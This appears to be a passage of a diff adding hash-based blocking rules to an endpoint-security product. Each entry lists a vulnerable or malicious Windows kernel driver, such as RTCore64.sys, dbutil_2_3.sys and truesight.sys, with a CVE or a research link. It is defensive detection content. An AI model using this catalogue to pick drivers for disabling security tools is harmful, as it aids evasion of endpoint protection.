+ "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "689995fe5db058b23ce5f421e9bc256377f40ada2b74c9c50672a54d1b98834e", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "039b36fd-622b-5014-9afa-ca4ebb77f3d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458521Z", + "creation_date": "2026-03-23T11:45:30.458524Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458533Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "234fc829bfd4d8d5dca351be176f5a06cb29bbfd5632a93cc218936d32a44851", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "03b3f3a8-9979-56fb-b988-58051e45ea43", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613154Z", + "creation_date": "2026-03-23T11:45:29.613156Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613161Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7f75d91844b0c162eeb24d14bcf63b7f230e111daa7b0a26eaa489eeb22d9057", + "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) 
[https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "03bb5dd9-6232-5b30-baf4-6942e653836f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617609Z", + "creation_date": "2026-03-23T11:45:29.617611Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617616Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "48d67eacca3ff6a4310f3164988b832ba7142021aec0d7a1b988be240b7ad170", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "03bb70a2-e818-51b1-a84c-69305b28b316", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478104Z", + 
"creation_date": "2026-03-23T11:45:30.478107Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478116Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "992eb531739029456311043f99fa48ac896a59e70edc48093facaf3479e0c3f0", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "03bb82b7-08e3-52b2-aa32-b2cbc91aeeac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808239Z", + "creation_date": "2026-03-23T11:45:31.808242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808251Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61939a658ad0d4d93fde596a40ef9e81e4b2d3833ca614d6216e8445741aef7a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"03dde572-6100-504c-a8c7-9dce7a9d4f53", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479583Z", + "creation_date": "2026-03-23T11:45:30.479585Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479591Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "33c6c622464f80a8d8017a03ff3aa196840da8bb03bfb5212b51612b5cf953dc", + "comment": "Vulnerable Kernel Driver (aka HWiNFO64I.SYS) [https://www.loldrivers.io/drivers/080a834f-3e19-4cae-b940-a4ecf901db28/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "03e7d81d-3ba9-5ba2-a30b-d225d2508d6a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978826Z", + "creation_date": "2026-03-23T11:45:29.978828Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978833Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c", + "comment": "Vulnerable Kernel Driver (aka speedfan.sys) [https://www.loldrivers.io/drivers/137daca4-0d7b-48aa-8574-f7eb6ad02526/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "03f12abe-2f1e-5835-8784-c77cdb8167a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143826Z", + "creation_date": "2026-03-23T11:45:31.143828Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143834Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2256ff8815e0f956ecda7946b37aa28816f6ab6ef91db426de4e49055c0f3741", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "03f65d58-acc5-5747-9a2b-efc1f77662c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821449Z", + "creation_date": "2026-03-23T11:45:31.821451Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821456Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e19076fa8c2424904b383c36c73eadfb5dbbde610cbaef094e4928036ff8b39", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0403f78e-afc0-56b5-9a87-9ddd8bead19f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817462Z", + "creation_date": "2026-03-23T11:45:31.817464Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817470Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"72190ae623520142cb34bfdc76b04b76bf1293ad7cc96827cb27b7c9cb44ac6d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "040d99da-dace-552a-b0d4-1406c2c8054c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973340Z", + "creation_date": "2026-03-23T11:45:29.973342Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973347Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351", + "comment": "Voicemod Sociedad Limitada vulnerable driver (aka vmdrv.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "041ff1cd-b3b9-5941-81b3-d0931f57ad33", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617913Z", + "creation_date": "2026-03-23T11:45:29.617915Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617921Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1ce9e4600859293c59d884ea721e9b20b2410f6ef80699f8a78a6b9fad505dfc", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04248533-2444-5e51-af83-9d552253ad9e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476493Z", + "creation_date": "2026-03-23T11:45:30.476496Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476506Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd2f1f7012fb1f4b2fb49be57af515cb462aa9c438e5756285d914d65da3745b", + 
"comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "043aab6e-63d3-5a52-9ff3-d9ce9f89ab42", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.471655Z", + "creation_date": "2026-03-23T11:45:31.471659Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471668Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8218462d1cd9f1c9815c7282600eb2dbc88215c56e3c2618e8784da29fb3ab04", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04428a81-4f00-5fa8-95e6-a11ee8e7f984", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.487162Z", + "creation_date": "2026-03-23T11:45:31.487164Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487170Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "796b4afe7d3976ca2e6e680860f4b374b45db8e86499fff4ef4365ba36fee072", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "044f82e6-8799-596e-a713-905e8d9405c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460550Z", + "creation_date": "2026-03-23T11:45:30.460554Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460563Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad0309c2d225d8540a47250e3773876e05ce6a47a7767511e2f68645562c0686", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"046ebb29-cf3d-5066-a846-2b9c28debf0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617361Z", + "creation_date": "2026-03-23T11:45:29.617363Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617368Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4780da56667e01cdd7eff83c23c772d68deb4d9fdb69d5302f556bb424151f51", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "047816b9-c437-5c9d-a035-9435722b434b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984638Z", + "creation_date": "2026-03-23T11:45:29.984640Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.984646Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42e170a7ab1d2c160d60abfc906872f9cfd0c2ee169ed76f6acb3f83b3eeefdb", + "comment": "Vulnerable Kernel Driver (aka BS_I2cIo.sys) [https://www.loldrivers.io/drivers/66be9e0a-9246-4404-b5b5-7fbde351668f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "047a07a6-c90d-557b-a1c5-a573e8d7d6c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976517Z", + "creation_date": "2026-03-23T11:45:29.976519Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976525Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2bbbe2ae5aa51868e7afc2c16c3a0a79fa3302e6830feeccca7f0363a62dddb4", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) 
[https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "047d8882-5302-5b74-9ce6-c818766e0e2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479829Z", + "creation_date": "2026-03-23T11:45:31.479833Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479843Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "739f9676a4d86b0f725f1ebd897777123947ef5c24cf1f2822ffe4fbe9acff5c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04a3135d-7592-5d1a-9fda-e6e9d020538e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456277Z", + "creation_date": 
"2026-03-23T11:45:30.456280Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456289Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "831b62145c21557928a694e6261e830f1545b5756ad51dcbd28a15fde570f4e7", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04a3e689-0b75-509e-be90-19b1db24fea1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607165Z", + "creation_date": "2026-03-23T11:45:29.607168Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607173Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1", + "comment": "Dell vulnerable driver (aka dbutil_2_3.sys) [CVE-2021-21551] [https://github.com/SpikySabra/Kernel-Cactus] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04aa5ae2-2d8e-5cd0-93cd-9702483d0a60", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830438Z", + "creation_date": "2026-03-23T11:45:30.830440Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830445Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cccd9bc2995be22986e22253724bf11c73d7a19ff77343c695cd888ad976c3d7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04aee2b1-21d0-5a6f-ab12-c524f6233464", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141415Z", + "creation_date": "2026-03-23T11:45:31.141417Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141423Z", + "rule_level": null, + "rule_level_override": null, 
